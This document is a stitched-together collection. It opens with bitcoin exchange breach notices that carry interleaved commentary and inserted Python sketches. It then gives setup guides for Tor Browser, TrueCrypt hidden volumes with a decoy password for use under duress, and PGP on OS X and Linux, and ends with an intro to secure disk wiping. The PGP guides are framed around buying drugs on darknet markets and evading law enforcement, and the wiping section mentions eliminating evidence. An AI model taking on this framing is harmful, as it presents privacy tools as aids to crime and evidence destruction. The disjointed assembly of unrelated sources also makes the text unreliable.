The attack was directed not only against the bitcoin7.com server but also against other websites and servers that were part of the same network. Eventually the hackers managed to breach the network, which subsequently led to a major breach of the bitcoin7.com website.
As a result of the hacking, unknown individuals managed to gain full access to the site’s main bitcoin depository/wallet and 2 of the 3 backup wallets.
In addition the hackers gained access to our user database.
This sounds like an application vulnerability that allowed forged deposits that could eventually be withdrawn from a hot wallet. This sort of attack is more common with “off blockchain” wallets.
After careful analysis of the intrusion we have concluded that the software that waited for Bitcoin confirmations was far too lenient. An unknown attacker was able to forge Bitcoin deposits via the Shopping Cart Interface (SCI) and withdraw confirmed/older Bitcoins. This led to a slow trickle of theft that went unnoticed for a few days. Luckily, we do keep a percentage of the holdings in cold storage so the attackers didn’t completely clean us out. Just to clarify, we weren’t “fully” hacked aka “rooted”. You can still trust our PGP, SSL, and Tor public keys.
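The lenient-confirmation bug described here has a simple structural fix: never credit a deposit until it has enough confirmations. A minimal sketch of that policy (the threshold, helper name, and data shapes are illustrative, not any real exchange's code):

```python
# Sketch of a stricter deposit-crediting policy. REQUIRED_CONFIRMATIONS,
# credit_deposit, and the dict shapes are hypothetical, for illustration only.

REQUIRED_CONFIRMATIONS = 6  # common rule of thumb before treating a tx as final

def credit_deposit(deposit, balances):
    """Credit a deposit to the user's balance only once it is well confirmed."""
    if deposit["confirmations"] < REQUIRED_CONFIRMATIONS:
        return False  # leave it pending; a reorg or forgery could still undo it
    user = deposit["user"]
    balances[user] = balances.get(user, 0) + deposit["amount"]
    return True

balances = {}
credit_deposit({"user": "alice", "amount": 5, "confirmations": 1}, balances)  # ignored
credit_deposit({"user": "alice", "amount": 5, "confirmations": 6}, balances)  # credited
```

The point of the design is that a forged or unconfirmed deposit never touches the withdrawable balance, which is exactly the invariant the SCI code above failed to enforce.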
The cause is very uncertain. The operator suspects a third party destroying a host on AWS, but operator error looks highly possible, since the “breach” occurred during a major upgrade.
On 26 July 2011, at about 23:00, I found the Bitcoin server overloaded and had to increase the RAM. As a result of this operation, the entire virtual machine was removed, and with it all the information, including the wallet and all of its backups. I found that the data did not simply vanish into Nirvana: the virtual machine's settings had been changed, even though I had changed nothing. Our host, Amazon Web Services, indicates that the deleted machine was configured so that, once shut down, it is irrevocably “destroyed” (including all data on the hard disks).
I am still trying to determine who changed the settings on the VM and whether it is possible to recover the deleted data. Unfortunately, the collaboration with Amazon Web Services (AWS) has been very difficult. Once I realized that the virtual machine was lost, I immediately ordered AWS premium support, talked to the manager, and asked for protection of my data. So far without success.
To this day I have not been able to find out the exact cause of this misery. I suspect the actions of third parties who wanted to cover up their illegal activities, or even wanted to crash the whole service. Should my suspicions in that direction harden, I will go to the police and the prosecutor's office with the case. For this I need the cooperation of AWS, which (as mentioned above) is currently very difficult to obtain. Efforts at data recovery are of course still in progress.
Recently, BoingBoing ran an article about how some librarians in Massachusetts were installing Tor software in all their public PCs to anonymize the browsing habits of their patrons. The librarians are doing this as a stand against passive government surveillance as well as companies that track users online and build dossiers to serve highly-targeted advertising.
It’s an interesting project and a bold stand for user privacy. But the good news is that if you want to browse anonymously, you don’t have to go to the library to use Tor. Connecting to the Tor network from your own PC is quick and painless thanks to the Tor project’s dead simple Tor Browser.
What is Tor?
Tor is a computer network run by volunteers worldwide. Each volunteer runs what is called a relay, which is just a computer that runs software allowing users to connect to the Internet via the Tor network.
Before hitting the open Internet, the Tor Browser will connect to several different relays, wiping its tracks each step of the way, making it difficult to figure out where, and who, you really are.
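The “wiping its tracks each step of the way” structure can be pictured as layers: the client wraps the message once per relay, and each relay peels exactly one layer. A toy illustration in Python, with base64 standing in for real encryption (nothing here is cryptographically meaningful):

```python
import base64

# Toy model of Tor's layered ("onion") encryption. Base64 stands in for real
# cryptography here; this only illustrates the wrap-then-peel structure.
relays = ["guard", "middle", "exit"]

def wrap(message: str, hops: list) -> bytes:
    """The client adds one layer per relay in the circuit."""
    data = message.encode()
    for _ in hops:
        data = base64.b64encode(data)
    return data

def peel(data: bytes) -> bytes:
    """Each relay removes exactly one layer and forwards the rest."""
    return base64.b64decode(data)

onion = wrap("GET /", relays)
for _ in relays:          # guard, middle, exit each peel one layer
    onion = peel(onion)
assert onion == b"GET /"  # only after the final relay is the request visible
```

Because no relay can peel more than its own layer, no single relay sees both who you are and what you are requesting.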
While Tor is gaining a reputation as a tool for buying illicit goods online, the software has numerous legitimate uses. Activists masking their location from oppressive regimes and journalists communicating with anonymous sources are two simple examples.
If, like the librarians in Massachusetts, you don't have an exotic reason for using Tor, it's still a good tool to keep your browsing private from your ISP, advertisers, or passive government data collection. But if the NSA or another three-letter agency decided to actively target your browsing habits, that's a whole different ballgame.
The easiest way to use Tor is to download the Tor Browser [official link]. This is a modified version of Firefox along with a bunch of other software that connects you to the Tor network.
Once you’ve downloaded the installer, you have two options: You can just install the software or you can check the installation file’s GPG signature first. Some people like to check the installation file to make sure they’ve downloaded the proper version of the browser and not something that’s been tampered with.
But checking the GPG signature is not a painless process and requires an additional software download. Nevertheless, if that’s something you’d like to do, the Tor Project has a how-to explaining what’s required [official link].
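Full GPG signature verification needs GnuPG itself, but the simpler cousin of that check, comparing a download against a published SHA-256 digest, can be sketched in a few lines. The filename and digest below are made up for illustration; they are not Tor Project values:

```python
import hashlib

def sha256_of(path: str) -> str:
    """Hash a file in chunks so large downloads need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Hypothetical usage, comparing against a digest published on the project site:
# assert sha256_of("torbrowser-install.exe") == "expected-digest-from-website"
```

Note that a checksum only proves the file wasn't corrupted or swapped relative to the published digest; a GPG signature additionally proves who published it.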
Whether or not you’ve checked the GPG signature, the next step is to install the Tor browser itself.
You can install the Tor browser on a USB stick.
For Windows, the Tor Browser comes as an EXE file, so it’s basically like installing any other program. The key difference is that the browser doesn’t have the same default location as most programs. Instead, it offers your desktop as the install location.
The Tor browser does this because it is portable software and doesn’t integrate into a Windows system the way typical programs do. This means you can run the Tor browser from almost anywhere—the Desktop, your documents folder, or even a USB drive.
When you arrive at the Choose install location window, click Browse… and then choose where you'd like to install the browser. As you can see in the image above, I installed it to a USB drive that I tote around on my key chain.
Once you’ve got your location selected, just press Install and Tor takes care of the rest.
Using the Tor Browser
Once the browser is installed, you’ll have a plain old folder called Tor Browser. Open that and inside you’ll see “Start Tor Browser.exe”. Click that file and a new window opens asking whether you’d like to connect directly to the Tor network or if you need to configure proxy settings first.
Most people can simply connect directly to the Tor network to get started. (Click to enlarge.)
For most people, choosing the direct option is best, so choose Connect. A few seconds later a version of Firefox will launch, and you are now connected to the Tor network and able to browse in relative anonymity.
To make sure you're connected to Tor, go to whatismyip.com, which will automatically detect your location based on your Internet Protocol address. If your browser shows you coming from a location that is not your own, you are good to go. Just make sure you do all your anonymous browsing from the Tor Browser itself, as other programs on your system are not connected to Tor.
But browsing anonymously on Tor isn't quite as easy as booting up a program. There are also some rules of the road you should observe, such as connecting to every site possible via SSL/TLS encryption (HTTPS). If you don't, then anything you do online can be observed by the person running your exit node. The browser has the Electronic Frontier Foundation's HTTPS Everywhere add-on installed by default, which should cover your SSL/TLS needs most of the time.
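The core of what HTTPS Everywhere does, rewriting plain-HTTP links to their encrypted equivalents, reduces to a tiny URL transformation. A toy sketch of that idea (the real add-on uses per-site rulesets, not a blanket rewrite):

```python
from urllib.parse import urlsplit, urlunsplit

def upgrade_to_https(url: str) -> str:
    """Rewrite an http:// URL to https://, leaving everything else untouched."""
    parts = urlsplit(url)
    if parts.scheme == "http":
        parts = parts._replace(scheme="https")
    return urlunsplit(parts)

print(upgrade_to_https("http://example.com/login"))  # https://example.com/login
```

With the exit node in mind, the difference matters: over plain HTTP the exit operator sees your full request and response, while over HTTPS they see only which host you connected to.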
The Tor Project has more tips on browsing anonymously [official link].
Also, remember that browsing in anonymity does not make you immune to viruses and other malware. If you are going to the seedier parts of the Internet, Tor cannot protect you from malicious software that could be used to reveal your location.
For the average Internet user, however, the Tor Browser should be enough to stay private online. You can also check available Tor friendly VPN services with no logs [link].
If you save anything on your computer, it is likely that you do not want just anyone to be able to see what you have saved. You want a way to protect that information so that you can access it, and absolutely no one else except those you trust. Therefore, it makes sense to set up a system which protects your information and safeguards it against prying eyes.
The best such system for this is called TrueCrypt. TrueCrypt is an encryption software program that allows you to store many files and directories inside of a single file on your hard drive. Further, this file is encrypted, and no one can actually see what you have saved there unless they know your password.
This sounds extremely high tech, but it is actually very easy to set up.
Setting up Truecrypt
1. Go to http://www.truecrypt.org/downloads (or go to www.truecrypt.org, and click on “Downloads”)
2. Under “Latest Stable Version”, under “Windows 7/Vista/XP/2000”, click “Download”
3. The file will be called “TrueCrypt Setup 7.0a.exe” or something similar. Run this file.
4. If prompted that a program needs your permission to continue, click “Continue”.
5. Check “I accept and agree to be bound by these license terms”
6. Click “Accept”
7. Ensure that “Install” is selected, and click “Next”
8. Click “Install”
9. You will see a dialog stating “TrueCrypt has been successfully installed.” Click “Ok”
10. Click “No” when asked if you wish to view the tutorial/user’s guide.
11. Click “Finish”
At this point, TrueCrypt is now installed. Now we will set up truecrypt so that we can begin using it to store sensitive information.
1. Click the “Windows Logo”/”Start” button on the lower left corner of your screen.
2. Click “All Programs”
3. Click “TrueCrypt”
4. Click the “TrueCrypt” application
And now we can begin:
1. Click the “Create Volume” button
2. Ensuring that “Create an encrypted file container” is selected, click “Next”
3. Select “Hidden TrueCrypt volume” and click “Next”.
4. Ensuring that “Normal mode” is selected, click “Next”
5. Click on “Select File”
Note which directory you are in on your computer. Look at the top of the dialog that has opened and you will see the path you are in, most likely the home directory for your username. An input box is provided with a flashing cursor asking you to type in a file name. Here, type in the following filename: random.txt
You may of course replace random.txt with anything you like. This file is going to be created and will be used to store many other files inside. Do NOT use a filename for a file that already exists. The idea here is that you are creating an entirely new file.
It is also recommended, though not required, that you “hide” this file somewhere less obvious. If it is in your home directory, then someone who has access to your computer may find it more easily. You can also choose to put this file on any other media; it doesn't have to be your hard disk. You could, for example, save your TrueCrypt file to a USB flash drive, an SD card, or some other media. It is up to you.
6. Once you have typed in the file name, click “Save”
7. Make sure “Never save history” is checked.
8. Click “Next”
9. On the “Outer Volume” screen, click “Next” again.
10. The default Encryption Algorithm and Hash Algorithm are fine. Click “Next”
11. Choose a file size.
In order to benefit the most from this guide, you should have at least 10 gigabytes of free disk space. If not, then it is worth it for you to purchase some form of media (such as a removable harddrive, a large sd card, etc.) in order to proceed. TrueCrypt can be used on all forms of digital media not just your hard disk. If you choose to proceed without obtaining at least ten gigabytes of disk space, then select a size that you are comfortable with (such as 100 MB).
Ideally, you want to choose enough space to work with. I recommend 20 GB at least. Remember that if you do need more space later, you can always create additional TrueCrypt volumes using exactly these same steps.
12. Now you are prompted for a password. THIS IS VERY IMPORTANT. READ THIS CAREFULLY
READ THIS SECTION CAREFULLY
The password you choose here is a decoy password. That means, this is the password you would give to someone under duress. Suppose that someone suspects that you were accessing sensitive information and they threaten to beat you or worse if you do not reveal the password. THIS is the password that you give to them. When you give someone this password, it will be nearly impossible for them to prove that it is not the RIGHT password. Further, they cannot even know that there is a second password.
Here are some tips for your password:
A. Choose a password you will NEVER forget. It may be ten years from now that you need it. Make it simple, like your birthday repeated three times.
B. Make sure it seems reasonable, that it appears to be a real password. If the password is something stupid like “123” then they may not believe you.
C. Remember that this is a password that you would give to someone if forced. It is *NOT* your actual password.
D. Do not make this password too similar to what you plan to really use. You do not want someone to guess your main password from this one.
And with all of this in mind, choose your password. When you have typed it in twice, click “Next”.
13. “Large Files”, here you are asked whether or not you plan to store files larger than 4 GIGABYTES. Choose “No” and click “Next”
14. “Outer Volume Format”: here you will notice some random numbers and letters next to where it says “Random Pool”. Go ahead and move your mouse around for a bit. This will increase the randomness and give you better encryption. After about ten seconds of this, click “Format”.
15. Depending on the file size you selected, it will take some time to finish formatting.
“What is happening?”
TrueCrypt is creating the file you asked it to, such as “random.txt”. It is building a file system contained entirely within that one file. This file system can be used to store files, directories, and more. Further, it is encrypting this file system in such a way that without the right password it will be impossible for anyone to access it. To *anyone* other than you, this file will appear to be just a mess of random characters. No one will even know that it is a truecrypt volume.
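The “filesystem inside one file” idea can be sketched in miniature: serialize some files into a single blob, then encrypt the blob so it reads as random bytes without the password. The sketch below uses SHA-256 as a password-derived XOR keystream purely for illustration; it is NOT secure and is NOT how TrueCrypt works internally:

```python
import hashlib
import json

# Toy "container": many files serialized into one blob, then XORed with a
# password-derived keystream. Insecure by design; illustration only.

def keystream(password: str, n: int) -> bytes:
    """Derive n pseudo-random bytes from a password (toy construction)."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(f"{password}:{counter}".encode()).digest()
        counter += 1
    return out[:n]

def seal(files: dict, password: str) -> bytes:
    """Pack a {name: text} mapping into one opaque blob."""
    blob = json.dumps(files).encode()
    return bytes(a ^ b for a, b in zip(blob, keystream(password, len(blob))))

def open_container(blob: bytes, password: str) -> dict:
    plain = bytes(a ^ b for a, b in zip(blob, keystream(password, len(blob))))
    return json.loads(plain)

container = seal({"diary.txt": "secret notes"}, "correct horse")
# `container` is now an opaque byte string; without the password it reveals nothing.
assert open_container(container, "correct horse") == {"diary.txt": "secret notes"}
```

A wrong password yields garbage bytes that fail to parse, which mirrors the tutorial's point: to anyone without the password, the file is just a mess of random characters.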
16. “Outer Volume Contents”, click on the button called, “Open Outer Volume”
An empty folder has opened up. This is empty because you have yet to put any files into your truecrypt volume.
DO NOT PUT ANY SENSITIVE CONTENT HERE
This is the “Decoy”. This is what someone would see if you gave them the password you used in the previous step. This is NOT where you are going to store your sensitive data. If you have been forced into a situation where you had to reveal your password to some individual, then that individual will see whatever is in this folder. You need to have data in this folder that appears to be sensitive enough to be protected by truecrypt in order to fool them. Here are some important tips to keep in mind:
A. Do NOT use porn. Adult models can sometimes appear to be underaged, and this can cause you to incriminate yourself unintentionally.
B. Do NOT use drawings/renderings/writings of porn. In many jurisdictions, these are just as illegal as photographs.
C. Good choices for what to put here include: backups of documents, emails, financial documents, etc.
D. Once you have placed files into this folder, *NEVER* place any more files in the future. Doing so may damage your hidden content.
Generally, you want to store innocent data where some individual looking at it would find no cause against you, and yet at the same time they would understand why you used TrueCrypt to secure that data.
Now, go ahead and find files and store them in this folder. Be sure that you leave at least ten gigabytes free. The more the better.
When you are all done copying files into this folder, close the folder by clicking the “x” in the top right corner.
17. click “Next”
18. If prompted that “A program needs your permission to continue”, click “Continue”
19. “Hidden Volume”, click “Next”
20. The default encryption and hash algorithms are fine, click “Next”
21. “Hidden Volume Size”: the maximum available space is indicated in bold below the text box. Round down to the nearest full unit. For example, if 19.97 GB is available, select 19 GB. If 12.0 GB is available, select 11 GB.
22. If a warning dialog comes up, asking “Are you sure you wish to continue”, select “Yes”
23. “Hidden Volume Password”
IMPORTANT READ THIS
Here you are going to select the REAL password. This is the password you will NEVER reveal to ANYONE else under any circumstances. Only you will know it. No one will be able to figure it out or even know that there is a second password. Be aware that an individual intent on obtaining your sensitive information may lie to you and claim to be able to figure this out. They cannot.
It is HIGHLY recommended that you choose a 64 character password here. If it is difficult to remember a 64 character password, choose an 8 character password and simply repeat it 8 times. A date naturally has exactly 8 numbers, and a significant date in your life repeated 8 times would do just fine.
24. Type in your password twice, and click “Next”
25. “Large Files”, select “Yes” and click “Next”.
26. “Hidden Volume Format”: as before, move your mouse around randomly for about ten seconds, and then click “Format”.
27. If prompted “A program needs your permission to continue”, select “Continue”
28. A dialog will come up telling you that the hidden TrueCrypt volume has been successfully created. Click “Ok”
29. Click “Exit”
Congratulations! You have just set up an encrypted file container on your hard drive. Anything you store here will be inaccessible to anyone except you. Further, you have protected this content with TWO passwords. One that you will give to someone under threat, and one that only you will know. Keep your real password well protected and never write it down or give it to anyone else for any reason.
Now, we should test BOTH passwords.
Testing TrueCrypt Volumes
Once you have completed the above section, you will be back at TrueCrypt. Go ahead and follow these steps to test the volumes you have made.
1. Click “Select File…”
2. Locate the file you created in the last section, most likely called “random.txt” or something similar. Remember that even though there is both an outer and a hidden volume, both volumes are contained in a single file. There are not two files, only one.
3. Click “Open”
4. Choose a drive letter that you are not using (anything past M is probably fine). Click on it; for example, click on “O:” to highlight it.
5. Click “Mount”
6. Now you are prompted for a password. Read the below carefully:
The password you provide here will determine WHICH volume is mounted to the drive letter you specified. If you type in your decoy password, then O: will show all the files and directories you copied that you would reveal if forced. If you type in your real password, then O: will show the files and directories that you never intend anyone to see.
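The decoy mechanism can be pictured as one container that answers differently depending on which password you supply. This is a conceptual model only (TrueCrypt really decides by which volume header the password successfully decrypts), but the observable behaviour matches this little table:

```python
# Conceptual model only: one container, two passwords, two different views.
# The filenames and passwords below are made-up examples.
container = {
    "decoy password": ["tax_backup.pdf", "old_emails.zip"],
    "real password": ["sensitive_notes.txt"],
}

def mount(password: str):
    # A wrong password and a nonexistent volume look identical: you get nothing,
    # and nothing reveals that a second (hidden) volume even exists.
    return container.get(password)

assert mount("decoy password") == ["tax_backup.pdf", "old_emails.zip"]
assert mount("anything else") is None
```

That indistinguishability is the whole point of the design: an adversary holding the decoy password cannot prove a second volume exists.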
7. After successfully typing in your password, you will see additional detail to the right of the drive letter, including the full path to the file you selected as well as the kind of volume it is (for example, hidden).
8. Right click on your “Windows Logo”/”Start Menu” icon, and scroll down to the bottom where you can see your different drive letters. You will see the drive letter you selected, for example: “Local Disk (O:)”. Click on that.
9. If you selected your decoy password, you will see all the files and folders that you moved there during the installation phase. If you selected the real password, you will see whatever files and directories you have placed so far into the hidden volume, if any.
If you selected your hidden volume password, you may now begin moving any sensitive information you wish. Be aware that simply moving it from your main hard disk is not enough. We will discuss how to ensure deleted data is actually deleted later in the guide.
“What is happening?”
When you select a file and mount it to a drive, you are telling your computer that you have a new drive with files and folders on it. It is the same thing as if you had plugged in a usb flash drive, a removable harddrive, or an sd card into your computer. TrueCrypt causes your computer to think that there is an entirely new disk drive on your computer. You can use this disk drive just as if it *was* actually a usb flash drive. You can copy files to it, directories, and use it just as you would use a usb flash drive.
When you are done, simply close all open windows/folders/applications that are using your truecrypt drive letter, and then click “Dismount” from within TrueCrypt while you have the drive letter highlighted. This will once again hide all of this data, accessible only by re-mounting it with the correct password.
VERY IMPORTANT SAFETY INFORMATION
When a TrueCrypt hidden volume is mounted, someone who has access to your computer can access anything inside that hidden volume. If, for example, you left your computer running while a TrueCrypt volume was mounted, then anyone who gained access to your computer would be able to see everything you have in that volume. Therefore:
ALWAYS REMEMBER TO DISMOUNT ANY TRUECRYPT VOLUME CONTAINING ANY SENSITIVE INFORMATION WHEN YOU ARE NOT USING YOUR COMPUTER
You can tell that it is dismounted because the drive letter inside TrueCrypt's control panel will appear the same as all of the other drive letters, with no information to the right of the drive letter.
You should practice Mounting and Dismounting a few times with both passwords to make sure you understand this process.
Once you have copied files/folders into the hidden volume, do NOT touch the files or folders in the outer volume anymore. Remember that both volumes occupy the same single file, and therefore changing the outer volume can damage the hidden volume. Once you have copied files/folders into the outer volume during the installation process, that is the last time you should do so. From that point forward, use ONLY the hidden volume. The outer volume exists only as a decoy if you need it.
Part 0 – Introduction
Here’s my basic guide for PGP on OS X. The OS in question is OS X 10.9 Mavericks, but it should still work for other versions. As for the tool itself, we’ll be using GPG Suite Beta 5. This is my first time using OS X in… years. If you see anything I’m doing wrong, or could be done easier, feel free to correct me in the comments.
If you’ve done your research, you’ll see it’s not recommended to do anything darknet related on OS X, but I’m not going to go over the details here. You’ve obviously made your decision.
Part 1 – Installing the software
Like I said above, we’ll be using GPG Suite Beta 5. If you’re curious and want to see the source code, you can do so here.
- Head on over to https://gpgtools.org, and download ‘GPG Suite Beta 5’
- Open the file you downloaded, you should see this screen. Double click on ‘Install’
- Follow the installation process. If successful, you should see this screen. You can now close the window
Part 2 – Creating your keypair
GPG Suite actually makes this a super simple process. Just like the Linux guide, we’ll be using 4096 bit length for encryption.
- Open up GPG Keychain, you should be greeted by this beautiful window
- Click ‘New’ at the top left of the window
- You should see a small popup. Click the arrow beside ‘Advanced options’, make sure the key length is 4096. For our purposes, we’ll uncheck ‘key expires’. Put your username where it says ‘full name’, fill out what you want for email, and create a secure passphrase. Check the picture for an example on how to fill it out. When complete, click ‘Generate key’
- GPG Keychain will begin generating your key. Move the mouse around, mash keys in a text editor, have something downloading. Do random stuff to create entropy for a secure key.
- annndddddd we’re done!
Part 3 – Setting up the environment
This is where OS X differs from other platforms. The suite itself doesn’t provide a window to encrypt/decrypt messages, so we need to enable some options.
- Go into system preferences, open up ‘Keyboard’
- You should see this window. Click the ‘Keyboard Shortcuts’ tab at the top, then ‘Services’ in the left pane. Scroll down in the right pane to the subsection labeled ‘Text’, and to the OpenPGP options. Here you can create keyboard shortcuts. We’ll uncheck everything OpenPGP that’s under ‘Text’, and delete their shortcuts. Now we’ll enable ‘Decrypt’, ‘Encrypt’, and ‘Import key’. Create keyboard shortcuts for these if you wish. Check the picture to make sure you’re doing everything correctly. You can now close the window.
Part 4 – Obtaining your public key
This part is super simple.
- Open up GPG Keychain, select your key
- At the top of the window, click ‘Export’
- Give it a name, make sure ‘include secret key in exported file’ is unchecked, and click ‘save’
- Open your text editor of choice, browse to where you saved the key, open it
- There it is. Copy and paste this on your market profile to make it easier for people to contact you
Part 5 – Obtaining your private key
Again, super simple.
- Open up GPG Keychain, select your key
- At the top of the window, click ‘Export’
- Keep the file name it gives you, check ‘Include secret key in exported file’, then click save
Keep this file in a safe place, and don’t forget your passphrase. You’re fucked without it!
Part 6 – Importing a public key
This is really easy.
- Find the key you want to import.
- Copy everything from '-----BEGIN PGP PUBLIC KEY BLOCK-----' to '-----END PGP PUBLIC KEY BLOCK-----'
- Paste it into your favourite text editor, highlight everything, right click, go to ‘Services’, then ‘OpenPGP: Import key’
- You’ll see this window pop up confirming the key has been imported, click ‘Ok’
- Open up GPG Keychain just to confirm the key is there
Part 7 – Importing a private key
Again, really easy.
- Open GPG Keychain, click ‘Import’ at the top
- Browse to where your key is, click it, then click ‘Open’. It should have a .asc file extension
- You’ll see this pop up confirming your key has been imported. Click ‘Close’
Part 8 – Encrypting a message
- Open your text editor of choice, write your message
- Highlight the message, right click, ‘Services’, ‘OpenPGP: Encrypt’
- A window should appear. Select who you’re sending it to, sign it with your key if you wish, click ‘Ok’
- Copy everything, and send it to the recipient
Part 9 – Decrypting a message
Pretty much the same process as encrypting
- Open your text editor of choice, paste the message
- Highlight everything, right click, ‘Services’, ‘OpenPGP: Decrypt’
- A window should pop up. Enter your passphrase, then click ‘Ok’
- aannnddddd there’s your message
Part 10 – Conclusion
That wasn’t too hard, was it? Like I said in the intro, you shouldn’t be using OS X for DNM activities due to privacy issues, but I won’t go into it. This took forever to complete because OS X is a bitch to get running properly in a virtual machine. A guide for Windows will be coming next week!
Full credit goes to MLP_is_my_OPSEC for writing this tutorial – Thanks for publishing and giving us your permission to post it!
Part 0 – Introduction
I promised it, and here it is! The PGP guide for Linux! Great timing too for Moronic Monday. For this guide we’ll be using GnuPG with Gnu Privacy Assistant as a graphical front-end. We will be using CLI to install these two pieces of software, and creating the keypair. The example OS in question is Linux Mint, so the commands for install may differ from your current OS. Don’t fret though! That’s the only part that may not be relevant to your OS, the rest of the guide will be the same across distros.
Part 1 – Installing the software
Like I said in the intro, we’ll be using GnuPG with Gnu Privacy Assistant. I like GPA as a graphical front-end because its layout is really easy to understand and follow.
- Open up Terminal
- Type, without quotes, ‘sudo apt-get install gpa gnupg2’, then hit ‘enter’
- Enter your password, hit ‘enter’
- It will pull the dependencies needed for both to work properly, tell you the space needed, and ask you to confirm. Type ‘y’ then hit ‘enter’ to confirm
- Wait a bit as everything installs
This should only take a few minutes to complete. See this picture to confirm you’re doing the steps correctly:
Part 2 – Generating your keypair
Part 1 was easy, eh? Don’t worry, things don’t get much harder. The next step is to create your keypair. We’ll be using 4096-bit RSA to keep things extra secure!
- In your Terminal, type without quotes ‘gpg --gen-key’, then hit ‘enter’
- It will ask you what kind of key you want. For our use case, we want option ‘1’:
- Next step is key length. The longer the length, the more secure it is. We’ll go with 4096 bits:
- It will now ask if you want your key to expire after a certain amount of time. This is up to personal preference, but we’ll choose ‘key does not expire’, so just hit ‘enter’
- Confirm that yes, the key will not expire. Type ‘y’, then hit ‘enter’
- The next step will be to enter an ID to make it easier for people to identify your key. If you’ve made it this far, you should know what to do
- It will ask if this information is correct. If it is, type ‘O’ and hit ‘enter’
Here is a great XKCD comic on creating secure passphrases
- Enter a passphrase to protect your secret key.
- Here comes the fun part. It’s going to generate your key, and will ask you to do some random stuff to create entropy. I like to have a YouTube video going with a torrent running in the background, while randomly mashing keys in a text editor. See the picture for an example of what will be output in the terminal
- annnddddd we’re done!
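The guide above walks through the interactive prompts, but GnuPG also supports unattended key generation from a parameter file (its "batch mode"). A minimal sketch is below; the name and passphrase are placeholders you would change, and the actual generation command is left commented out since it takes a while and needs entropy:

```shell
# Write a GnuPG batch-mode parameter file mirroring the interactive choices
# above (RSA, 4096 bits, no expiry). "alice" and the passphrase are placeholders.
cat > gen-params <<'EOF'
Key-Type: RSA
Key-Length: 4096
Name-Real: alice
Expire-Date: 0
Passphrase: change-this-passphrase
%commit
EOF
# To actually generate the key, you would then run:
#   gpg --batch --gen-key gen-params
cat gen-params
```

This is handy if you ever need to script key creation, but for a first key the interactive prompts shown above are fine.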
Part 3 – Obtaining your public key
So we’ve installed the software and generated our super-secure keypair. Now what? Well, if you want to actually use it, we need to obtain our public key. Everything from here will be done through the graphical front-end.
- Open Terminal, type ‘sudo gpa’, hit ‘enter’. Type in your password (yeah, I know what you’re thinking)
- You’ll be greeted by this beautiful window
- Click on the keypair you just created, click ‘Keys’ up at the top, then ‘Export keys…’
- Select where you want it saved, enter a filename, and click ‘Save’
- Browse to the location in your file manager, open up that file with a text editor
There’s your public key! Don’t forget to put this on your market profile so people can contact you more easily.
Part 4 – Obtaining your private key
If you ever want to switch operating systems or PGP programs, you’ll need to do this. It’s just as easy as obtaining your public key. Make sure you keep this file safe!
- Hopefully you still have GPA open. If not, follow step #1 of Part 3
- Click on your keypair, click ‘Keys’ up at the top then ‘Backup’
- Select where you want it saved, keep the filename it gives you, and click ‘Save’
- A window will pop up, you can back up to a floppy if you’re stuck in the ’80s
Remember to keep this file safe! Don’t forget your passphrase!
Part 5 – Importing a public key
So you want to buy some dank marijuanas. You’ll need to encrypt your message unless you want LE kicking down your door and putting a boot to your throat. How is this done? Easy!
- Obtain the recipient’s public key, which can hopefully be found on their profile
- Copy everything, paste into a text editor, save it somewhere
- In GPA, click ‘Keys’ up at the top, then ‘Import key…’
- Select the key, then click ‘Open’. You’ll see this window
- We’re done!
I used some random key found on DDG. Thanks Alan!
Part 6 – Importing a private key
You finally realized that Microsoft/Apple is spying on you, and want to switch to an operating system that respects your right to privacy. How do you bring your key over?
- Up at the top, select ‘Keys’, then ‘Import Keys…’
- Select your backup, it should have a file extension of .asc
- This window will appear
- Your key is now imported
I could do this blindfolded!
Part 7 – Encrypting a message
GPA makes this easy as pie. Seriously, if you still can’t do it after following the below steps you shouldn’t be here.
- Click ‘Windows’ at the top, then ‘Clipboard’
- This beautiful window will appear
- Type in your message
- Click the envelope with the blue key
- Select the recipient of the message, sign it with your key if you want, then click ‘Ok’
- Your encrypted message will now appear in the buffer. Copy everything and send this to the recipient
Part 8 – Decrypting a message
You sent your message, and the vendor responded! Now what? You’ll want to decrypt the message with your private key.
- Copy everything the vendor sent you, paste it into the buffer
- Click the envelope at the top with the yellow key
- Enter your passphrase
- Read your message
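Everything GPA does in Parts 3 through 8 can also be done straight from the terminal. A sketch of the equivalent gpg commands, saved here as a cheat-sheet script rather than executed, since each line needs a real key in your keyring; the key ID "alice" and all file names are placeholders:

```shell
# gpg command-line equivalents of the GPA steps above.
# "alice" and the file names are placeholders; substitute your own.
cat > gpg-cheatsheet.sh <<'EOF'
#!/bin/sh
gpg --armor --export alice > public.asc              # Part 3: export public key
gpg --armor --export-secret-keys alice > secret.asc  # Part 4: back up private key
gpg --import their-key.asc                           # Parts 5/6: import a key
gpg --armor --encrypt --recipient alice message.txt  # Part 7: encrypt a message
gpg --decrypt message.txt.asc                        # Part 8: decrypt a message
EOF
chmod +x gpg-cheatsheet.sh
```

Knowing the CLI versions is useful on headless boxes or when GPA isn’t available.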
Part 9 – Conclusion
There we have it, an easy to follow PGP guide for Linux with pictures! PGP can be overwhelming at first, but with persistence and the willingness to learn anyone can do it. Hopefully this guide will keep you guys safe on the DNM! I’ll have an OS X guide coming soon, and possibly a Windows guide following that. Any and all constructive feedback is appreciated, as well as suggestions for other guides!
In this article, I’m going to be outlining how to securely erase data on a device while running a GNU/Linux-based operating system. This process can be used to wipe a device, such as a USB drive, while running your normal GNU/Linux operating system; or it can be used to wipe your hard drive from a GNU/Linux live CD/USB.
There are many reasons you might want to erase data from a device. It’s possible that you are selling an old computer, and need to eliminate private data. It’s possible your identity has been compromised, and you need to eliminate evidence. Whatever the situation is, simple deletion of files will not securely erase data. If you truly need to erase data from a device, you will need to wipe the device. What’s the issue with simply deleting your data? Deletion of a file does not actually remove the data from a disk; it only deletes the entry in the filesystem metadata. This informs the operating system that the space is free and can be written to. The actual raw data is still located on the disk. Even if a disk is reformatted or repartitioned, the raw data may still remain on the disk. With widely-available data recovery software, most of this data can be quickly recovered. The only way to ensure that data cannot be recovered is to verify that all space on a disk, including inode space, is overwritten with new data.
